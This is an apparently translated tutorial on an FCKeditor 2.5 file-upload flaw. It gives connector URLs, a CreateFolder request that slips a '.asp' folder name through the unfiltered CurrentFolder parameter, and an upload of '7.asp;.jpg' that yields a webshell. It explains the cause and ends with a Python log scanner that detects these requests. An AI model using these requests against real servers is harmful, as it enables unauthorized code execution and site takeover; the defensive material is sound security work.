## FCKeditor editor

---

> The editor can be downloaded here: http://download.csdn.net/detail/u011781521/9767326

### Editor basics

1. Check the editor version

   Path: FCKeditor/\_whatsnew.html

2. FCKeditor editor page

   Path: FCKeditor/\_samples/default.html

3. Common upload addresses

```url
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
```

Because version 2.5 is used here, the following address works:

> http://192.168.60.102:99/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

If testing the addresses above produces the prompt "this connector is disabled,please check the xxx file", the file upload feature is not enabled and has to be turned on:

```
# File path
\editor\filemanager\connectors\asp\config.asp
# Parameter
Dim ConfigIsEnabled
ConfigIsEnabled = False
```

### FCKeditor exploitation method → file upload vulnerability

First go to the back-end page referred to above.

#### Exploitation

1. Create a new folder named captain.asp. The system renames it to captain_asp; this is FCKeditor's mechanism of filtering "." into "\_".
2. To get past it, create the folder by giving an absolute path, which bypasses the filtering function directly. Requesting the following address creates the folder successfully:

   ```
   /editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo7777.asp&NewFolderName=xx.asp
   ```

3. Then upload `7.asp;.jpg` into the `fendo7777.asp` folder and check whether it is parsed.
4. After the upload succeeds, access the file. The default file path is shown below; the webshell has been obtained.

   `http://x.x.x.x/userfiles/image/fendo7777.asp;.jpg`

#### Cause of the vulnerability

Why can the folder not be created by hand, yet be created through the address above? Compare the manual request with the request sent to the address above:

```
# Vulnerable address:
/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo7777.asp&NewFolderName=x.asp
# Manual creation:
/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=captain.asp
```

**Cause:**

- CurrentFolder: the current folder. It is not filtered (nothing under this folder is filtered).
- NewFolderName: the name of the new folder. It is filtered.
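A defender-side check for the root cause described above, as an added example that is not part of the original page: it scans request lines for connector calls whose `CurrentFolder` or `NewFolderName` carries a script extension, and for script-like names requested under `userfiles/`. The `METHOD TARGET STATUS` log format, the extension list and the function names are assumptions; the sample log is constructed from the URLs shown on this page.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: extensions the web server would execute; adjust for the site.
SCRIPT_EXT = ("asp", "asa", "cer", "cdx", "aspx")
# Matches a segment such as "name.asp" or "name.asp;.jpg".
SEGMENT_RE = re.compile(r"\.(?:%s)(?:;|$)" % "|".join(SCRIPT_EXT), re.I)

def risky_segments(path):
    """Return path segments that end in (or embed, before ';') a script extension."""
    return [s for s in re.split(r"[\\/]+", path) if SEGMENT_RE.search(s)]

def check_request(target):
    """Return findings for one request target; an empty list means nothing flagged."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    findings = []
    if "/filemanager/" in path and "connector" in path:
        # Check BOTH folder parameters: the root cause on this page is that
        # only NewFolderName is filtered while CurrentFolder is not.
        query = {k.lower(): v[0] for k, v in parse_qs(parts.query).items()}
        for name in ("currentfolder", "newfoldername"):
            findings += [f"{name}={seg}" for seg in risky_segments(query.get(name, ""))]
    elif "/userfiles/" in path:
        # Script-like names inside the upload directory should never be requested.
        findings += [f"path={seg}" for seg in risky_segments(path)]
    return findings

def scan(log_text):
    """Scan 'METHOD TARGET STATUS' lines; return {line_number: findings} for hits."""
    hits = {}
    for number, line in enumerate(log_text.splitlines(), start=1):
        fields = line.split()
        if len(fields) >= 2 and (found := check_request(fields[1])):
            hits[number] = found
    return hits

# Constructed sample log (not real traffic); targets reuse the URLs shown above.
SAMPLE_LOG = """\
GET /editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ 200
GET /editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=captain.asp 200
GET /editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo7777.asp&NewFolderName=xx.asp 200
GET /userfiles/image/holiday.jpg 200
GET /userfiles/image/fendo7777.asp;.jpg 200
"""

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG).items():
        print(number, found)
```

The same `risky_segments` test, applied to every path component of `CurrentFolder` before the connector acts on it, is the server-side form of this check.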